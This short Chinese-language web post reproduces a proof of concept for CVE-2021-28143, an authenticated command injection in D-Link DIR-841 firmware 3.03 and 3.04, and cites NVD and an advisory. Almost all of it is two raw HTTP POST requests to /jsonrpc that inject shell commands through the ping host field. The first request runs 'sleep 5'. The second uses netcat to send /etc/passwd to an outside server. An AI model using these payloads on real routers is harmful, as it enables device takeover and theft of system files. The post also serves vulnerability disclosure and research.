# D-LINK DIR-841 命令注入(CVE-2021-28143)
D-Link DIR-841 3.03和3.04 存在经过身份验证的命令注入,通过“系统工具”(ping/ping6/traceroute)命令注入,可导致攻击者进行完全控制设备。
PoC:
“`
POST /jsonrpc HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Digest username=”admin”, realm=”domain”, nonce=”4784226″, uri=”/jsonrpc”, response=”84799b55020cf2c53e28214e3d60b899″, qop=auth, nc=00000035, cnonce=”bPzBB3mcvSb51Ijx”
Content-Length: 156
Origin: IP
Connection: close
Referer: http://ip-address:9821/admin/index.html
Cookie: user_ip=0.0.0.0; device_mode=router; user_login=admin; device-session-id=
{“jsonrpc”:”2.0″,”method”:”write”,”params”:{“id”:166,”data”:{“host”:”‘127.0.0.1 & sleep 5′”,”count”:1,”is_ipv6″:false,”max_ttl”:30,”nqueries”:2,”waittime”:3},”save”:true},”id”:757}
“`
Exfiltrating files
“`
POST /jsonrpc HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Digest username=”admin”, realm=”domain”, nonce=”4784226″, uri=”/jsonrpc”, response=”84799b55020cf2c53e28214e3d60b899″, qop=auth, nc=00000035, cnonce=”bPzBB3mcvSb51Ijx”
Content-Length: 156
Origin: IP
Connection: close
Referer: http://ip-address:9821/admin/index.html
Cookie: user_ip=0.0.0.0; device_mode=router; user_login=admin; device-session-id=
{“jsonrpc”:”2.0″,”method”:”write”,”params”:{“id”:166,”data”:{“host”:”‘127.0.0.1 & nc SERVER-IP 1234 < /etc/passwd'","count":1,"is_ipv6":false,"max_ttl":30,"nqueries":2,"waittime":3},"save":true},"id":757} ``` ref: * https://nvd.nist.gov/vuln/detail/CVE-2021-28143 * https://github.com/vitorespf/Advisories/blob/master/DLINK-DIR-841-command-injection.txt
请登录后查看评论内容